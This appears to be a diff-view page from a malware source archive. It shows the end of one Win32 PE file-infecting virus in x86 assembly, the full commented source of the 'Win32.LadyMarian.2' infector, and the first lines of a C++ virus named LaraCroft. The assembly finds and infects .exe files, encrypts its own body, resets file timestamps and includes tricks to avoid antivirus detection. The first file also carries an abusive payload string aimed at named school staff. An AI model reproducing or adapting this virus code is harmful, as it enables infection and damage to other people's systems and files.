mov dword ptr [ebp + FileHandle], eax ;Save file handle
xor eax, eax
lea edi, [ebp + offset WorkBuffer + 56] ;Go to memory to initalize
stosd
stosd ;This fixes a very lame bug, It should really zero out the
;whole workbuffer before each file
;is read but since its a runtime virus its written
;for efficency.
mov edx, 63 ;Read in first 63 bytes
lea ecx, [ebp + offset WorkBuffer] ;Buffer we read into
call Read_file
cmp dword ptr [ebp + offset BytesRead], 63
jb TryNext ;Did we read in enough?
lea ebx, [ebp + offset WorkBuffer]
cmp word ptr [ebx], 'ZM' ;Is it an exe?
jne TryNext ;If it isnt scan next file
add ebx, 3Bh ;Go to the infection marker
cmp byte ptr [ebx], 'a' ;are we infected already?
je TryNext ;If so try next file
inc ebx ;Point to relocation
mov edx, dword ptr [ebx] ;Read the relocation
mov dword ptr [ebp + offset MZReloc], edx ;Save the relocation
call Set_Pointer ;Set file pointer to PE header
cmp eax, 0FFFFFFFFh
je TryNext
mov edx, 120 ;Try to read in first 120 bytes of PE Header
lea ecx, [ebp + offset WorkBuffer] ;Buffer we read into
call Read_file
cmp dword ptr [ebp + offset BytesRead], 120
jne TryNext ;Did we read in enough?
cmp word ptr [ebp + offset WorkBuffer], 'EP' ;Are we in in the peheader?
jne TryNext
mov ebx, dword ptr [ebp + offset HeaderSze] ;Get the HeaderSize
sub ebx, dword ptr [ebp + offset MZReloc] ;Subtract the MZ header
mov dword ptr [ebp + offset HeaderSize], ebx ;Save the PE header's size
cmp ebx, 3000 ;Are we going to overflow our memory?
ja TryNext
push ebx ;Save number of bytes to read in
mov edx, dword ptr [ebp + offset MZReloc] ;Reset pointer back to the peheader
call Set_Pointer
cmp eax, 0FFFFFFFFh
je TryNext
pop edx ;Try to read in HeaderSize bytes
lea ecx, [ebp + offset WorkBuffer] ;Buffer we read into
call Read_file
mov ebx, dword ptr [ebp + offset Headersize] ;How many bytes should have been read?
cmp ebx, dword ptr [ebp + offset BytesRead]
jne TryNext ;Did we read in enough?
xor ecx, ecx
mov cx, word ptr [ebp + offset NumObjects] ;Read in number of objects
cmp cx, 00h ;Are there objects?
je TryNext
xor ebx, ebx
mov bx, word ptr [ebp + offset NTHeaderSze] ;Read in the NTHeaderSize
add ebx, 24 ;Add on the rest
lea edx, dword ptr [ebp + offset WorkBuffer]
;Workbuffer + NTHeadersize + 24 = start of object table
add edx, ebx ;Locate the object table
push edx ;Save start of object table
xor edx, edx
mov eax, ecx ;Handoff # of objects
mov ecx, 40 ;Each object is 40 bytes long
mul ecx ;# objects * 40
sub eax, 40 ;Backtrack to start of last object
pop edx ;Make edx the start of the object table in memory
add edx, eax ;Point edx to last object
mov ebx, dword ptr [edx + 20] ;Load the Physical Offset
push ebx ;Save for use with virtual size
mov eax, dword ptr [edx + 16] ;Load the Physical Size
add ebx, eax ;Add them together
mov edi, dword ptr [ebp + offset FileSize] ;Wont work if file is larger than 4.3 gigs...oh well
add edi, (offset EndVirus - offset StartVirus) + (offset Encryptionframe - offset Encrypt) ;Put on the virussize of our virus in memory
sub edi, ebx ;Determine distance from end of virus to old end of object
add eax, edi ;Make our new physical size
mov ebx, eax
sub ebx, (offset EndVirus- offset StartVirus) + (offset Encryptionframe - offset Encrypt)
mov esi, dword ptr [edx + 12] ;Get RVA for determining entrypointRVA
add esi, ebx ;Find out our entrypointRVA
mov dword ptr [ebp + offset VirusRVA], esi ;Save the virus's RVA
add esi, dword ptr [ebp + offset ImgBase] ;Make the Entrypoint RVA the EntrypointVA
add esi, (offset EncryptionFrame - offset Encrypt) ;Make it point to the encrypted virus in memory
mov dword ptr [ebp + offset VirusVA], esi ;Save the VA for later
mov ecx, dword ptr [ebp + offset FileAlign] ;Get our alignment value
; call File_Align ;Aligns eax
mov dword ptr [edx + 16], eax ;Save our new physical size
pop ebx ;Load the physical offset
mov eax, dword ptr [edx + 8] ;Load the virtual size
add ebx, eax ;Determine end of virtual space
mov edi, dword ptr [ebp + offset FileSize]
add edi, (offset BufferEnd - offset StartVirus) + (offset EncryptionFrame - offset Encrypt) ;Add the virus and its heap to it
sub edi, ebx ;Determine distance between end of virus's heap and end of virtual space
add edi, eax ;Make our virtual size
mov dword ptr [edx + 8], edi ;Save our new virtualsize
mov ecx, dword ptr [edx + 12] ;Get the objects RVA
add ecx, edi ;Make our new ImageSize
mov dword ptr [ebp + offset ImageSize], ecx ;Save our new Imagesize
mov dword ptr [edx + 36], 0E0000040h ;Fix the flags
;We do all the dispatcher and loading shit here
mov ecx, dword ptr [ebp + offset EntrypointRVA]
mov eax, dword ptr [ebp + offset VirusRVA]
mov dword ptr [ebp + offset EntrypointRVA], eax
sub eax, ecx
add eax, (offset relativity - offset startvirus) + (offset EncryptionFrame - offset Encrypt) ;Makeup for the call instruction
mov dword ptr [ebp + offset SaveEntry], eax
mov edx, 3Bh ;Offset we write marker byte at
call Set_Pointer ;Go to place to write marker
mov ebx, 1h ;Write one byte
lea ecx, dword ptr [ebp + offset InfectionMarker] ;The byte to write
call Write_File ;Write the infection marker
mov edx, dword ptr [ebp + offset MZReloc]
call Set_Pointer ;Goto the start of the peheader
mov ebx, dword ptr [ebp + offset BytesRead] ;How much to write
lea ecx, [ebp + offset WorkBuffer] ;Write our modified PE header
call Write_File ;Write it!
lea esi, [ebp + offset StartVirus] ;Copy the virus to the work buffer to encrypt
lea edi, [ebp + offset WorkBuffer] ;Where to copy it
mov dword ptr [ebp + offset StartEncrypt], edi ;We use this below
mov ecx, (offset EndVirus - offset StartVirus) ;How much to copy
rep movsb
inc byte ptr [ebp + offset Key] ;Change the key
Call Encrypt ;Encrypt our code
mov ebx, dword ptr [ebp + VirusVA] ;Get our Entrypoint VA
mov dword ptr [ebp + offset StartEncrypt], ebx ;Store it in the routine
xor edx,edx
call Set_EOF ;Go to EOF
mov ebx, (offset EncryptionFrame - offset Encrypt) ;Size of encryption routine to write
lea ecx, [ebp + offset Encrypt] ;Write encryption routine
call Write_File
mov ebx, (offset EndVirus - offset StartVirus) ;Size of the virus to write
lea ecx, [ebp + offset WorkBuffer] ;Where the encrypted virus is in memory
call Write_File ;Write the virus
lea ebx, [ebp + offset LastWriteTime] ;Get ptr to last writetime
push ebx
sub ebx,8 ;Point it to lastaccesstime
push ebx
sub ebx, 8 ;Point it to createtime
push ebx
push dword ptr [ebp + offset FileHandle] ;Push on the file handle
mov ebx, dword ptr [ebp + offset SetFileTime]
call ebx ;Change the file's times
call Close_File
DoneScanning:
push dword ptr [ebp + offset SearchHandle]
mov eax, [ebp + offset FindClose]
call eax
ExitScanning:
ret
TryNext:
call Close_File
jmp FindNextFile
Read_File:
push 0
lea ebx, [ebp + offset BytesRead] ;Where to put # of bytes read
push ebx
push edx ;Number of bytes to read
push ecx ;Address of buffer
push dword ptr [ebp + offset FileHandle]
mov ebx, dword ptr [ebp + offset ReadFile]
call ebx ;Read the file
ret
Write_File:
push 0
lea eax, [ebp + offset BytesWritten]
push eax ;Where to return # of bytes written
push ebx ;# of bytes to write
push ecx ;Where to write from
push dword ptr [ebp + offset FileHandle]
mov ebx, dword ptr [ebp + offset WriteFile]
call ebx
ret
;Upon Entry:
; edx=New actual address in file
Set_EOF:
push 02h
jmp jumpover
Set_Pointer:
push 00
jumpover:
push 0
push edx ;Where to go in file
push dword ptr [ebp + offset FileHandle]
mov ebx, [ebp + offset SetFilePointer]
call ebx
ret
File_Align:
;Upon entry ecx = alignment value
;eax = Size to process
;eax returns aligned size
push edx
xor edx, edx
div ecx
inc eax
mul ecx
pop edx
ret
Close_File:
push dword ptr [ebp + offset FileHandle]
mov eax, dword ptr [ebp + offset CloseFile]
call eax ;Close the file
ret
;Upon entry:
; esi=Function string table.
; edi=Our address table.
maketable:
lea ebx, [ebp + offset loadlibrarya]
push esi ;Next in string table
call dword ptr [ebx] ;call loadlibrarya
mov edx, eax ;Save module handle
loopuntilnull:
inc esi
cmp byte ptr [esi], 00h
jne loopuntilnull ;loop until at end of string
inc esi
cmp byte ptr [esi], 01h ;Are we on last loop?
je donelooping
lea ebx, [ebp + offset GetProcAddress]
push edx
push esi ;pointer to function name
push edx ;base address of dll
call dword ptr [ebx] ;Getprocaddress in import table
pop edx
stosd
jmp loopuntilnull
donelooping:
ret
resolveexport:
;Upon entry:
; ecx=start of RVA String table
; edx=imagebase
; ebx=start of string of function to resolve
;Returns:
; ebx=Address of function
xor edi,edi
scanstring:
mov esi, dword ptr [ecx] ;Load RVA of string to scan
add esi, edx ;Bias it by the Imagebase
push ebx ;Bad way to save ebx for later use
scanloop:
lodsb
cmp al, 00h ;Is it a null character?
je foundstring
cmp byte ptr [ebx], al ;Does the character match?
jne scannext ;If not scan next string
inc ebx ;Advance the byte we are
;scanning for.
jmp scanloop
scannext:
pop ebx
add ecx, 4 ;Move it to the next export?
inc edi ;Increment the counter
cmp dword ptr [ebp + NumExports], edi ;Are we on last export?
je exit ;Abort if out of exports
jmp scanstring
foundstring:
pop ebx ;Keep the stack nice and neat
add edi, edi ;Multiply by 2 because Ordinal
;Table is 16 bits
mov ebx, dword ptr [ebp + OrdinalTable]
add edi, ebx ;Point edi to getprocaddress's entry
xor ebx, ebx
mov bx, word ptr [edi] ;Get 16bit ordinal number
lea ebx, [ebx * 4] ;Multiply by 4 because the Address
;table is made of double words.
mov esi, dword ptr [ebp + AddressTable]
add esi, ebx ;Point esi to RVA in addresstable
mov ebx, dword ptr [esi] ;Move RVA to ebx
add ebx, edx ;Offset it with the imagebase
ret
Encrypt:
mov ecx, (offset EndVirus - offset StartVirus)
db 0BBh ;Mov ebx,
StartEncrypt dd 000000000h
db 0B0h ;mov al,
Key db 00h
XorLoop:
xor byte ptr [ebx], al
inc ebx
dec ecx
cmp ecx, 00h
jne XorLoop
EncryptionFrame:
ret
STARTDATA:
;We use these to find functions in KERNEL32.DLL's export table
LoadLibraryAS db "LoadLibraryA"
GetProcAddressS db "GetProcAddress"
;These are the functions we need to get the address's of:
APIList:
db "KERNEL32",0
db "FindFirstFileA",0
db "FindNextFileA",0
db "FindClose",0
db "SetFileAttributesA",0
db "SetFileTime",0
db "CreateFileA",0
db "ReadFile",0
db "WriteFile",0
db "SetFilePointer",0
db "CloseHandle",0
db "SetCurrentDirectoryA",0
db "GetCurrentDirectoryA",0,01h ;01h stops the looking up
db "Boles and Manning are arrogant facists."
db " They have no computer sk1llz and KENSTON HIGH SCHOOL's"
db " computers are 0wn3d. I AM BACK KOONS YOU MOTHERFUCKER "
db "dowN wiTh KenSTON..... yOU tRIED tO rID yOUrSELf oF mE BefoRE"
db "bUT fAILED"
db "HAHAHAHAHAHAHAHAHAHAHAHAHAHAHA"
DirWildcard db "*.",0
EXEWildcard db "*.exe",0
InfectionMarker db "a"
DotDot db "..",0
root db "",0
ENDVIRUS:
;These are addresses already offseted by the Image base when saved
ImageBase dd 1 dup (?)
ExportTable dd 1 dup (?)
AddressTable dd 1 dup (?)
NameTable dd 1 dup (?)
OrdinalTable dd 1 dup (?)
NumExports dd 1 dup (?)
GetProcAddressCall dd 1 dup (?)
;These are used in infecting files
BytesWritten dd 1 dup (?)
SearchHandle dd 1 dup (?)
DirSearchHandle dd 1 dup (?)
FileHandle dd 1 dup (?)
BytesRead dd 1 dup (?)
MZReloc dd 1 dup (?)
HeaderSize dd 1 dup (?)
NTHeaderSize dd 1 dup (?)
VirusRVA dd 1 dup (?)
InfectCounter dd 1 dup (?)
VirusVA dd 1 dup (?)
;Place to store the two routines used to look up the rest
LoadLibraryA dd 1 dup (?)
GetProcAddress dd 1 dup (?)
;This becomes a table of these functions address's
FindFile dd 1 dup (?)
FindNext dd 1 dup (?)
FindClose dd 1 dup (?)
SetAttrib dd 1 dup (?)
SetFileTime dd 1 dup (?)
CreateFile dd 1 dup (?)
ReadFile dd 1 dup (?)
WriteFile dd 1 dup (?)
SetFilePointer dd 1 dup (?)
CloseFile dd 1 dup (?)
SetCurrentDir dd 1 dup (?)
GetCurrentDir dd 1 dup (?)
DirSave db 256 dup (?)
win32_file_data:
fileattr dd 1 dup (?)
createtime dd 2 dup (?)
lastaccesstime dd 2 dup (?)
lastwritetime dd 2 dup (?)
dd 1 dup (?)
filesize dd 1 dup (?)
resv dd 2 dup (?)
fullname db 256 dup (?)
realname db 256 dup (?)
WorkBuffer:
Signature dd 1 dup (?)
Cputype dw 1 dup (?)
NumObjects dw 1 dup (?)
dd 3 dup (?)
NtHeaderSze dw 1 dup (?)
Flags dw 1 dup (?)
dd 4 dup (?)
EntrypointRVA dd 1 dup (?)
dd 2 dup (?)
ImgBase dd 1 dup (?)
Objectalign dd 1 dup (?)
Filealign dd 1 dup (?)
dd 4 dup (?)
Imagesize dd 1 dup (?)
Headersze dd 1 dup (?)
db 3000 dup (?)
BufferEnd:
ends
end STARTVIRUS
Win32/Infector/Win32.Kriz.asm
+2804
View File
File diff suppressed because it is too large Load Diff
Win32/Infector/Win32.LadyMarian.2.asm
+773
View File
@@ -0,0 +1,773 @@
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;
;
; Win32.LadyMarian.2
; Coded By ValleZ.
; Size: 848h bytes.
;
; This is my second virus and probably virus had not optimized code,or bad ideas,or
; other things,but,as i said,its my second so im excused :P if its a lame virus.
; Well,i thing this is a interesting virus becoz it infect with a method that i hadnt seen
; before(however i dont say it no exist,but i havent seen it). Virus overwrite code
; of host,over entry point,after it has copy host code in .reloc.When it returns to host
; it copy again host to entry point and jmp there.Virus place return to host rutine in
; imagebase + 26h, in word oeminfo and 5 * dword reserved.
; Virus is encrypted with random key.
; Virus no change flags of code section where it overwrite code of host becoz avs heuristic
; could detect it. It use VirtualProtect api to set his memory as writable.
; I want to include some antidebug rutines in virus code but finally i think better not
; becoz size of virus is 848h bytes...and if it grow up very much probably it cannot infect
; any file becoz it will be more big than reloc.
; Virus doesnt increase size of file and no change entry point.
; It places his own SEH and test files with SfcIsFileProtected api when sfc.dll exists.
; It infects all files in his folder that can be infected.
; In NT machines only infect if it has necesary permission.
; In header it only change: ImageBase + 26h to ImageBase + 3ch,with code to return host.
; Byte 1 of TimeDateStamp in PEheader + 08h.
; Flags of .reloc to do it not discarcheable.
;
;
; Payload: show a message box with no button :P close it with ctrl + alt + supr
; No more things.
; This virus is for Lady Mariam,the best girl in the world.
;
; Thx:
; Xezaw,my m3nt0r who shows me all i know :)
; mscorlib,thx for that help that u gave me :) u r a genius :D
; GriYo,thx u too for ur help too :)
;
; Sorry,my english is very bad so plz,excuse me.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.586p
.model flat,stdcall
extrn ExitProcess:proc
sizeVir = endVir - startVir
sizecrypt = decryptz - retHost
.data
db 0
.code
start:
startVir:
push ebx ;registers preserved too
push ecx
push edx
push esi
push edi
push ebp
call d_offset ;delta offset
d_offset:
pop ebp
sub EBP,offset d_offset
jmp decryptz
retHost:
SEHout:
mov esp,00000000h
pop dword ptr fs:[0] ;SEH return
pop ebp
pop ebp ;ebp too was saved,so we can restore it
lea eax,[ebp + offset baseCalc]
xor al,al
xor ecx,ecx
mov cx,100h
add eax,ecx
baseCalc:
sub eax,ecx
cmp word ptr [eax],'ZM' ;search for image base
jne baseCalc
mov esi,[eax + 1ch] ;dir of reloc
add esi,eax ;this header dword is modified
;when file is infected
mov ecx, [eax+3Ch]
add ecx, eax
mov dx,[ecx + 8]
cmp dx,'vz' ;test if this is a infected file,
jne Exit ;second generation,i no test it with
;or ebp,ebp becoz
;with this infection method
;sometimes ebp = 0 in 2º gen.
lea edi,[ebp + startVir]
add eax,26h ;goto return code in image base + 26h
jmp eax
Exit:
push 0
call ExitProcess
ReturnHost:
;return host code.It is put in dos
;header 5 reserved dwords + oeminfo.
mov eax,edi
mov ecx,sizeVir + 1
again1: rep movsb ;copy host code in entry point direction
jcxz next1 ;to recover the host body and
loop again1 ;next jmp to entry point and begin
next1: ;execution of host.
pop ebp
pop edi
pop esi ;i think some programs fails if not preserve
pop edx
pop ecx
pop ebx
jmp eax
ReturnHost_:
vir:
xor edx,edx ;small fix :P
mov [ebp + SfcIsFileProtectedz],edx ;sometimes fault becoz
;thought it has sfc api
;my SetWritrableCode rutine is prepared for with a few
;changes can search a api directly from export.
;really,rutine search VirtualProtect for
;change virus pages to readable,writable and executable
;but putting GetProcAddress offset in repuse + 2 and
;putting a ret in a good site rutine will search
;GetProcAddress and we not spend bytes in repeat code ;)
mov eax,offset GPA
mov dword ptr [ebp + repuse + 2],eax
mov ax,0c35bh ;pop ebx,ret
mov word ptr [ebp + repuse2],ax
lea eax,[ebp + SetWritableCode]
call eax
;of course after use rutine for our propose
;we must rewrite good offset of VP and good code
;where we write ret becoz when infect next generation
;file the code of rutine must be the first
lea ebx,[ebp + offset VP]
mov dword ptr [ebp + repuse + 2],ebx
mov cx,6a54h
mov word ptr [ebp + repuse2],cx
mov edi,[ebp + kern]
mov [EBP + offset GetProcAddressz],EAX
;we have GetProcAddress,we can be happy! We can get all apis we need and
;we can start to infect files ;)
;next code calc apis
;In data apis must be in this form:
;api1kernel 0 api2kernel 0 ... apiNkernel 00 Library1nxt 0 api1nxtLib 0 api2nxtLib 0
;... apiNnxtLib 00 ... LibreriaNnxt 000
;00 is change of library and 000 is finish of apis
lea ESI,[EBP + offset ApisNames]
mov ebx,edi
mov ECX,[EBP + offset GetProcAddressz]
lea EDX,[EBP + offset dirApis]
nextAPI:
push EDX
push ESI
push ebx
mov edx,[ebp + GetProcAddressz]
call edx
pop EDX
mov [EDX],EAX
add EDX,4h
searchApis:
inc ESI
mov AL,byte ptr[ESI]
or AL,AL
jnz searchApis
inc ESI
mov AL,byte ptr[ESI]
or AL,al
jnz nextAPI
inc ESI
mov AL,byte ptr[ESI]
or AL,al
jz allApisFounds
push EDX
cmp ebx,[EBP + offset kern]
je IsKern
IsKern: push ESI
mov eax,dword ptr [ebp + offset LoadLibraryAz]
call eax
or eax,eax ;por la sfc.dll en 9x
jz allApisButSfcNot
mov EBX,EAX
pop EDX
jmp searchApis
allApisButSfcNot:
pop edx
allApisFounds:
SEH: ;set SEH for me,save ebp too
push ebp
lea eax,[ebp + retHost]
push eax
mov eax,fs:[0]
push eax
mov fs:[0],esp
mov dword ptr[ebp + offset SEHout + 1],esp
;payload only show a message box if 23-7-XX,but when i had a moment ill put some payload
;a few more original :P
Payload: ;payload (only 9x)
mov eax,dword ptr [ebp + offset GetVersionz]
call eax
test EAX,08000000h
jnz FirstFile
lea ESI, [EBP + offset SystemTime]
push ESI
mov eax,[EBP + offset GetSystemTimez]
call eax
cmp [ESI.ST_wMonth],7
jne FirstFile
cmp [ESI.ST_wDay],23
jne FirstFile
lea eax,[ebp + pay]
lea esi,[ebp + paytit]
push 07h
push esi
push eax
push 0
mov eax,dword ptr [ebp + offset MessageBoxAz]
call eax
FirstFile: ;infect all .exe in his folder that could infect
lea eax,[ebp + offset files]
lea ESI,[ebp + offset WIN32_FIND_DATA]
push ESI
push EAX
mov eax,dword ptr [ebp + offset FindFirstFileAz]
call eax
inc eax
jz retHost
dec eax
mov [ebp + handFile],eax
jmp infection
NextFile:
push dword ptr [ebp+WFD_dwFileAttributes]
lea eax, [ebp + WFD_szFileName]
push eax
mov eax,dword ptr [ebp + offset SetFileAttributesAz]
call eax
lea ESI,[ebp + offset WIN32_FIND_DATA]
mov eax,[ebp + handFile]
push esi
push eax
mov eax, dword ptr [ebp + offset FindNextFileAz]
call eax
or eax,eax
jz retHost
infection:
lea edi,[ebp + offset WFD_szFileName]
mov eax,dword ptr [ebp + offset GetVersionz]
call eax
test EAX,08000000h
jz _9x
NT:
;in NT only infect if have permiss
mov eax,[ebp + offset WFD_dwFileAttributes]
test eax,1915h
jnz NextFile
_9x: ;sfp?? i test it for NT and 9x becoz i have listened
;millenium have it too,true?
push edi
push 0
mov eax,[ebp + SfcIsFileProtectedz]
or eax,eax
jz nosfc
call eax
or eax,eax
jnz NextFile
nosfc:
;next part is tipycal file mapping
push 80h
push edi
mov eax, dword ptr[ebp + offset SetFileAttributesAz]
call eax
xor eax,eax
push eax
push eax
push 3
push eax
inc eax
push eax
push 0C0000000h
push edi
mov eax,dword ptr [ebp + offset CreateFileAz]
call eax
inc eax
or eax,eax
jz Closed
dec eax
mov [ebp + offset CreateFileHand],eax
xor ebx,ebx
push ebx
push dword ptr[ebp+ offset WFD_nFileSizeLow]
push ebx
push 4
push ebx
push eax
mov eax, dword ptr [ebp + offset CreateFileMappingAz]
call eax
or eax,eax
jz CloseFile
mov [ebp + offset CreateFileMappingHand],eax
push dword ptr[ebp + offset WFD_nFileSizeLow]
xor ebx,ebx
push ebx
push ebx
push 000F001Fh
push eax
mov eax, dword ptr [ebp + offset MapViewOfFilez]
call eax
or eax,eax
jz CloseMapping
mov [ebp + offset MapViewOfFileHand],eax
mov edi,eax
cmp word ptr [edi],'ZM' ;test if PE file
jne CloseView
cmp word ptr[edi + 8],4
jne CloseView
mov esi,[edi + 3ch]
add esi,edi
cmp word ptr[esi],'EP'
jne CloseView
mov ax,[esi + 8] ;not infected yet??
cmp ax,'vz'
je CloseView
mov eax,[esi + 28h]
xor ebx,ebx
mov bx,word ptr[esi + 14h]
add ebx,18h
add ebx,esi
push ebx
BuscaEntrySec:
mov ecx,dword ptr[ebx + 0ch]
add ecx,dword ptr[ebx + 10h] ;search for entryPoint section,
cmp eax,ecx ;the section where is entryPoint.
jb EntrySection
add ebx,28h
jmp BuscaEntrySec
EntrySection:
mov edx,[esi + 28h]
sub edx,[ebx + 0ch]
add edx,[ebx + 14h] ;offset of Epoint in file.No RVA.
add edx,edi
;AddressOfEntryPoint - VAsection + PointerToRawData
mov [ebp + offset EntryPointInFile],edx
sub ecx,eax ;SectionEnd - entryPoint
mov eax,sizeVir
cmp ecx,eax
jb nxt ;enought size for put virus?
jmp nonxt
nxt:
pop ebx
jmp CloseView
nonxt:
mov ecx,eax
pop ebx
push ecx
mov cx,[esi + 6]
sub ebx,28h
inc cx
buscaReloc:
dec cx ;searching for reloc
or cx,cx
jz nxt2
jmp nonxt2
nxt2:
pop ecx ;no .reloc
jmp CloseView
nonxt2:
add ebx,28h ;is this section .reloc?? compare...
lea eax,[ebp + offset reloc]
push ebx
push eax
lea eax,[ebp + offset compara]
call eax
pop edx
pop edx
or eax,eax
jne buscaReloc
pop ecx
cmp dword ptr [ebx + 10h],ecx
;enought space in reloc for virus?
jb CloseView
push ebx
push esi
mov eax,dword ptr [ebx + 0ch]
mov [edi + 1ch],eax ;reloc dir for nxt gen
mov ebx,[ebx + 14h] ;go start .reloc
add ebx,edi
;copy return to host code to imagebase + 26h,overwriting oeminfo and next 5 reverved word.
;returnHost is 22 bytes, word oeminfo + 5 * dword reserveds ;)
CopyToReserved:
add edi,26h
lea esi,[ebp + offset ReturnHost]
tamReturn = ReturnHost_ - ReturnHost
xor ecx,ecx
mov cl,tamReturn
again2: rep movsb ;copying...
jcxz next2
loop again2
next2:
CopyReloc: mov esi,[ebp + offset EntryPointInFile]
mov edi,ebx
mov ecx,sizeVir+1 ;copy host in reloc for recover later...
again3: rep movsb
jcxz next3
loop again3
next3:
lea esi,[ebp + offset startVir]
mov edi,[ebp + offset EntryPointInFile]
mov eax,edi
mov ecx,sizeVir ;copying...
again4: rep movsb ;overwriting host with virus >:D
jcxz next4
loop again4
next4:
sizedecrypt = endVir - decryptz
sub edi,sizedecrypt
mov ecx,sizecrypt
mov eax,[ebp + GetTickCountz]
call eax
cryptaz:
dec edi ;crypt byte to byte with random key
xor byte ptr[edi],al
loop cryptaz
pop esi
pop ebx
mov dword ptr [ebx + 24h],40000040h
;reloc not discarchable!!
;i think avs no see this flag ;)
CloseHandlesInfectado:
mov ax,'vz'
mov [esi + 8],ax
CloseView:
push dword ptr[ebp + offset MapViewOfFileHand]
mov eax, dword ptr [ebp + offset UnmapViewOfFilez]
call eax
CloseMapping:
push dword ptr[ebp + offset CreateFileMappingHand]
mov eax,dword ptr[ebp + offset CloseHandlez]
call eax
CloseFile:
push dword ptr[ebp + offset CreateFileHand]
mov eax, dword ptr[ebp + offset CloseHandlez]
call eax
Closed:
jmp NextFile
datos:
kernel32_ db 'Kernel32',0
reloc db '.reloc',0
GPA db 'GetProcAddress',0
files db '*.exe',0
pay db 'This virus is for you,for Lady Marian.',0dh
db ' You are the only girl in the world',0dh
db 'whose i have in loved and never other girl',0dh
db ' could be in my heart so you have been.',0dh
paytit db ' i will not forget you...',0
ApisNames:
db 'LoadLibraryA',0
db 'GetSystemTime',0
db 'CreateFileA',0
db 'CreateFileMappingA',0
db 'MapViewOfFile',0
db 'CloseHandle',0
db 'UnmapViewOfFile',0
db 'FindFirstFileA',0
db 'FindNextFileA',0
db 'GetTickCount',0
db 'GetVersion',0
db 'SetFileAttributesA',0
db 'ExitProcess',0
db 0
db 'User32',0
db 'MessageBoxA',0
db 0
db 'sfc',0
db 'SfcIsFileProtected',0
finAPIS dw 00h
dirApis:
LoadLibraryAz dd 0
GetSystemTimez dd 0
CreateFileAz dd 0
CreateFileMappingAz dd 0
MapViewOfFilez dd 0
CloseHandlez dd 0
UnmapViewOfFilez dd 0
FindFirstFileAz dd 0
FindNextFileAz dd 0
GetTickCountz dd 0
GetVersionz dd 0
SetFileAttributesAz dd 0
ExitProcessz dd 0
MessageBoxAz dd 0
SfcIsFileProtectedz dd 0
CreateFileHand dd 0
CreateFileMappingHand dd 0
MapViewOfFileHand dd 0
EntryPointInFile dd 0
handFile dd 0
GetProcAddressz dd 0
Max_Path equ 260
FILETIME struc
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db Max_Path dup (?)
WFD_szAlternateFileName db 13 dup (?)
db 03 dup (?)
SYSTEMTIME struct
ST_wYear dw ?
ST_wMonth dw ?
ST_wDayOfWeek dw ?
ST_wDay dw ?
ST_wHour dw ?
ST_wMinute dw ?
ST_wSecond dw ?
ST_wMilliseconds dw ?
SYSTEMTIME ends
SystemTime SYSTEMTIME ?
decryptz:
call SetWritableCode
cmp byte ptr [ebp + offset retHost],0BCh ;encrypted??
je vir ;if no encryted jmp code
xor ecx,ecx
dec ecx
whatkey:
mov al,byte ptr [ebp + retHost]
;search the encryption key
xor al,cl
sub al,0bch
jz keyfound
loop whatkey
keyfound:
mov dl,cl
lea esi,[ebp + offset retHost]
mov edi,esi
mov ecx,sizecrypt
decrypt:
db 0d6h ;setalc,undocumented,antiheuristic,is good today???
lodsb
xor al,dl
stosb
loop decrypt
jmp vir
;SetWritableCode rutine searchs VirtualProtect in kernel export table for calling it
;later and do writable virus code memory zone.Why? Virus code is on code section
;and if code section flags say writable section,avs will see it and will advise
;user that infect file is a posible virus :S so we no set that flag and avs will be
;in silent :)
;In addition with a few modifications explanated and do up,this rutine will search
;getProcAddress so we dont spend bytes in repeat code ;)
SetWritableCode:
mov EAX,[ESP + 28]
xor AX,AX
mov edx,1000h
add eax,edx
VPsearch_kernel:
sub eax,edx
mov CX,word ptr[EAX]
cmp CX, 'ZM'
jne VPsearch_kernel
mov edi,eax
mov EAX,[EAX + 3Ch] ;PE
add EAX,edi
mov EAX,[EAX + 78h] ;Dir entrys
add EAX,edi ;export table
push eax
mov ECX,[EAX + 20h] ;exported func names
add ECX,edi
xor EDX,EDX
VPrepeat:
mov EBX,[ECX]
add EBX,edi
PUSH EBX ;search GetProcAddress
repuse:
lea EBX,[EBP + offset VP]
PUSH EBX
lea ebx,[ebp + offset compara]
call ebx
POP EBX
POP EBX
or EAX,eax
jz VPfinality
add ECX,4
inc edx
inc edx
jmp VPrepeat ;edx index ordinal
VPfinality:
mov EAX,[esp]
mov EAX,[EAX + 24h]
add EAX,edi ;eax -> ordinal
add EAX,EDX ;add index
mov EAX,[EAX] ;index for export address table
shr EAX,10h
dec EAX
mov EBX,[esp]
mov EBX,[EBX + 1ch] ;array of dirs of func
add EBX,edi ;we index it in eax
add EAX,EAX
add EAX,EAX
add EAX,EBX
mov EAX,[EAX] ;dir of VirtualProtect
add EAX,edi
repuse2:
push esp ;lpflOldProtect is a stack dword
push 40h ;writable,readable and executable
push sizeVir ;size of memory to put writable
lea ebx,[ebp + startVir]
push ebx
call eax
pop eax
mov [ebp + kern],edi
ret
;this useful ritune compare 2 strings and return 0 if they are identical and 1 if not.
compara:
push ECX
push ESI
push edi
mov ESI,[ESP + 20]
mov EDI,[ESP + 16]
mov ecx,esi
endString:
lodsb ;lenght of string
or al,al
jnz endString
sub esi,ecx
xchg esi,ecx ;ecx = lenght esi = start
xor eax,eax
repz cmpsb
je endCompara
inc eax
endCompara:
pop edi
POP ESI
POP ECX
ret
;arrrggghtt!! damn,i have had headache becoz i was using VP string before decrypt it!! ;@
VP db 'VirtualProtect',0
kern dd 0
endVir:
end start
end
Win32/Infector/Win32.LaraCroft.asm
+249
View File
@@ -0,0 +1,249 @@
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[LARACROFT.CPP]ÄÄÄ
#include "laracroft.h"
#pragma hdrstop
#pragma warning (disable: 4068)
#pragma warning (disable: 4001)
char LaraWinDir[256],LaraSysDir[256],LaraPath[256];
